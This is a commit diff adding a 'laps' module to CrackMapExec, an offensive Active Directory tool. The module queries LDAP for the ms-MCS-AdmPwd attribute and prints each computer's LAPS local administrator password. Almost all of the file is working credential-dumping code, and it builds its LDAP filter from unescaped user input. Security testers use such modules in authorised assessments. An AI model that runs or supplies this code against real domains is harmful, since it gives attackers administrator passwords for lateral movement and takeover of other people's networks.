Add LAPS module thx to @T3KX

cme/modules/laps.py

@@ -0,0 +1,48 @@
+from impacket.ldap import ldapasn1 as ldapasn1_impacket
+
+class CMEModule:
+    '''
+      Module by technobro refactored by @mpgn (now compatible with LDAP protocol + filter by computer)
+
+      Initial module:
+      @T3KX: https://github.com/T3KX/Crackmapexec-LAPS
+
+      Credit: @n00py1
+        Reference: https://www.n00py.io/2020/12/dumping-laps-passwords-from-linux/
+        https://github.com/n00py/LAPSDumper
+    '''
+
+    name = 'laps'
+    description = 'Retrieves the LAPS passwords'
+    supported_protocols = ['ldap']
+    opsec_safe = True
+    multiple_hosts = False
+
+    def options(self, context, module_options):
+        """
+            COMPUTER    Computer name or wildcard ex: WIN-S10, WIN-* etc. Default: *
+        """
+
+        self.computer = "*"
+        if 'COMPUTER' in module_options:
+            self.computer = module_options['COMPUTER']
+
+    def on_login(self, context, connection):
+     
+        context.log.info('Getting LAPS Passwords')
+
+        searchFilter = '(&(objectCategory=computer)(ms-MCS-AdmPwd=*)(name='+ self.computer +'))'
+        attributes = ['ms-MCS-AdmPwd','samAccountname']
+        result = connection.search(searchFilter, attributes, 10000)
+
+        for item in result:
+            if isinstance(item, ldapasn1_impacket.SearchResultEntry) is not True:
+                continue
+            msMCSAdmPwd = ''
+            sAMAccountName = ''
+            for computer in item['attributes']:
+                if str(computer['type']) == "sAMAccountName":
+                    sAMAccountName = str(computer['vals'][0])
+                else:
+                    msMCSAdmPwd = str(computer['vals'][0])
+            context.log.highlight("Computer: {:<20} Password: {}".format(sAMAccountName, msMCSAdmPwd))